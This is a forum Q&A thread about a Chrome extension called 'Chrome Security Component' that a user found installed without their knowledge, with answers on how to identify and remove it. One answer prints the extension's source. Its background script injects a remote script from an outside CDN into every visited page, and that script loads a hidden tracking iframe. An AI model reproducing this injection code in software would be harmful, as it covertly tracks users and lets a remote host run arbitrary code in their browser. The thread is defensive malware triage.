# Pop-up message upon launching Chrome: Confirm Changes - The extension "Chrome Security Component" has been added

Tags: windows-7, google-chrome, google-chrome-extensions

Upon launching Google Chrome a little pop up dialogue box appears in the top right hand corner of the browser which states:

> Confirm Changes
>
> The extension "Chrome Security Component" has been added.

It gives me the options to press OK or Details (I have not pressed OK), but upon pressing Details a new tab opens with my Chrome extensions.

There is an extension called **Chrome Security Component 1.0**  with a tick enabled to the right.

The writing immediately below its name says:

> Critical Security Update for Firefox

There are 2 little boxes:

- Allow incognito
- Allow access to URLs

Neither boxes are ticked.

To my knowledge I have not downloaded this extension from Chrome Web Store and would like advice?

Has anyone else come across this, it doesn't sound right especially the bit about it being a critical security update for Firefox!

Can Google Chrome add extensions automatically if they are for security reasons?

(This is also something that has appeared very recently in the last few times of launching Chrome, that's why I am sure I didn't download it as an extension)

[image]

Comment: which version of windows are you using?

Comment: Windows 7 64bit home premium

Comment: i use NIS 2013, Malwarebytes antimalware as my main antivirus arsenal

Comment: If it was legit, other Chrome users would have surely had the same extension added and pop up message ?

Answer (score 2, accepted):

The extension is [not available the Chrome web store](https://chrome.google.com/webstore/detail/hotot/kfejhbidgehdoaglokpfddkmiepmhcck), and looking at the generic Chrome plugin icon, along with the lack of presence in the webstore makes me believe that this is definitely not legit.

You should be able to check the Extension source code from `%localappdata%\Google Chrome\User Data\Default\Extensions\kfejhbidgehdoaglokpfddkmiepmhcck` folder and examine what it does.

> Can Google Chrome add extensions automatically if they are for security reasons?

I have seen external apps install extensions for Chrome(example would be Norton 360 which installs it's useless Protect extension) but this is definitely not from Mozilla.

Comment: Can I disable it ?

Comment: Also the way it says its a critical update for firefox (it has nothing to do with firefox) !

Comment: bit confused how to check source code given in answer above

Comment: @Simon goto the path mentioned above, check the manifest.js, and other js/html files. You can/should disable/remove it

Comment: I was having difficulty, locating the path, how do i get to %localappdata% ? I notice there is a bin next to the extension in the screenshot - where i can remove/delete it from there (hopefully)?

Comment: @simon yeah, click on the bin to delete it

Comment: Ok thanks alot, and if you have any friends, colleagues who at any point have this mysterious extension added when using chrome please let me know. As I'm baffled by it :)

Comment: Deleted :) !!!!

Comment: @Simon have you already fully deleted it? It would be interesting to get a copy of that and see what it actually does inside.

Comment: @nhinkle Yes about 30 secs ago.....Thats what i was interested in as well

Comment: would it be in the recycle bin ?

Comment: especially because it says it was a security update for firefox (what has that got to do with a Chrome extension)

Comment: i deleted by pressing the bin (trash can symbol) next to it in the extensions tab of Chrome

Comment: @nhinkle: I am busy now - perhaps at some point later today or tomorrow, I could post a question "Recovering a deleted Chrome Extension" if you like ?

Comment: @nhinkle If its possible that is and you want to test it out..just notify me....have a nice day :)

Comment: @Simon once deleted it's gone, won't be in recycle bin - you probably have to use recuva to find out where it is.

Comment: @Sathya OK well if its possible and nhinkle wants it to see what it does "for research purposes", from what it sounds like no one else on this forum has come across it, yet Google Chrome must be widely used here. Thx anyway for your help

Answer (score 2):

this is a bit more info for this extension:

```
Chrome Security Component


--------------------------------------
extension background.js
--------------
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo) {
    if (changeInfo.status === 'complete') {
        chrome.tabs.executeScript(tabId, {
            code: "var d = document; var js, id = 'wsk-node'; if (d.getElementById(id)) {return;}"+
                  "js = d.createElement('script'); js.id = id; js.async = true;"+
                  "js.src = '//cdn.io4o.com/js/all.js';"+
                  "d.getElementsByTagName('head')[0].appendChild(js);"
        });
    }
});


-----
//cdn.io4o.com/js/all.js
----

var host = window.location.host;

if (host != 'cdn.io4o.com') {
        var iframe = document.createElement('iframe');
        iframe.src = '//cdn.io4o.com/ga.html';
        iframe.style.width = 0;
        iframe.style.height = 0;
        iframe.style.border = 0;
        document.body.appendChild(iframe);
}

------
//cdn.io4o.com/ga.html
------

<html>
<head>
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-37051120-1']);
  _gaq.push(['_setDomainName', 'io4o.com']);

  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
</head>
<body>
</body>
</html>
```

Comment: Thx for that Federico, but do u know what it means ?

Comment: Hi Simon, it uses google analytics to track web pages.
https://developers.google.com/analytics/devguides/collection/gajs/

Comment: Oh right, I ended up removing it, but was it potentially harmful or not really ?

Comment: Not really as it's current state, but it tracks all visited web sites,
unless they change remote code for js and html (//cdn.io4o.com/js/all.js and //cdn.io4o.com/ga.html).
Personally, I suggest to remove it, as you did ;-)

Comment: Thx for your feedback

Answer (score 0):

> Can Google Chrome add extensions automatically if they are for security reasons?

Yes, Google Chrome permits automatic extension installation but that is not restricted to security reasons. What you have experienced is a so-called *external extension*.
From [Google Developer website](https://developer.chrome.com/extensions/external_extensions)

> An extension that's installed automatically is known as an external extension. Google Chrome supports two ways of installing external extensions:
>
> Using a preferences JSON file (Mac OS X and Linux only)
> Using the Windows registry (Windows only)

On Windows they are slipped through via these registry entries:

32-bit Windows: HKEY_LOCAL_MACHINE\Software\Google\Chrome\Extensions
64-bit Windows: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Google\Chrome\Extensions

Just delete the offending extension id (it will appear as a subkey)